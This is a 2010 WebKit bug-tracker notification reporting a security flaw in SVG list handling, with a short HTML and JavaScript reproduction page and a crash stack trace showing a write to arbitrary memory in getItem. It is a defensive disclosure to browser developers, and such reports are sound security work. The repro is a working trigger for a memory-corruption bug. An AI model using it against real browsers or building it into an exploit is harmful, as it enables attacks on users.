[Webkit-unassigned] [Bug 49061] New: chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem WriteAV at Arbitrary (578c0f7f21ca517ba29a4eafb7099c1b)

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Nov 5 02:26:47 PDT 2010


https://bugs.webkit.org/show_bug.cgi?id=49061

           Summary: chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem WriteAV at Arbitrary (578c0f7f21ca517ba29a4eafb7099c1b)
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
               URL: http://code.google.com/p/chromium/issues/detail?id=62031
        OS/Version: Windows Vista
            Status: NEW
          Severity: Normal
          Priority: P1
         Component: SVG
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org, zimmermann at kde.org,
                    mdelaney at apple.com


Created an attachment (id=73047)
 --> (https://bugs.webkit.org/attachment.cgi?id=73047&action=review)
Repro

Repro:
<html><head><script>
  function go() {
    // Three unrelated SVG elements, created in the parent document.
    var oSvgFEMorphologyElement = parent.document.createElementNS("http://www.w3.org/2000/svg", "feMorphology");
    var oSvgTextElement = parent.document.createElementNS("http://www.w3.org/2000/svg", "text");
    var oSvgRectElement = parent.document.createElementNS("http://www.w3.org/2000/svg", "rect");
    // An SVGLength taken from the rect's animated value is inserted into the text element's
    // base x list. 0000013 is a legacy octal literal (index 11); an out-of-range index appends.
    var oSvgLength = oSvgRectElement.height.animVal;
    oSvgTextElement.x.baseVal.insertItemBefore(oSvgLength,0000013);
    // Keep a reference to the animVal list wrapper, then mutate baseVal again with an item
    // from yet another element's animVal.
    oAnimVal = oSvgTextElement.x.animVal;
    oSvgTextElement.x.baseVal.insertItemBefore(oSvgFEMorphologyElement.height.animVal, 2639);
    // Reading back through the animVal wrapper triggers the write AV in getItem (see stack below).
    oSvgTextElement.x.animVal.getItem(1);
    console.log(oAnimVal);
    location.reload();
  }
</script></head><body onload="go();"></body></html>

This may be the same as issue 48829, which is not marked as security. In case it is, please hide that bug as well.

id:             chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem WriteAV at Arbitrary (578c0f7f21ca517ba29a4eafb7099c1b)
description:    Security: Attempt to write to unallocated arbitrary memory @ 0x00726576 in chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem
note:           Based on this information, this is expected to be a security issue!
stack:          chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem
                chrome.dll!WebCore::SVGLengthListInternal::getItemCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                ...
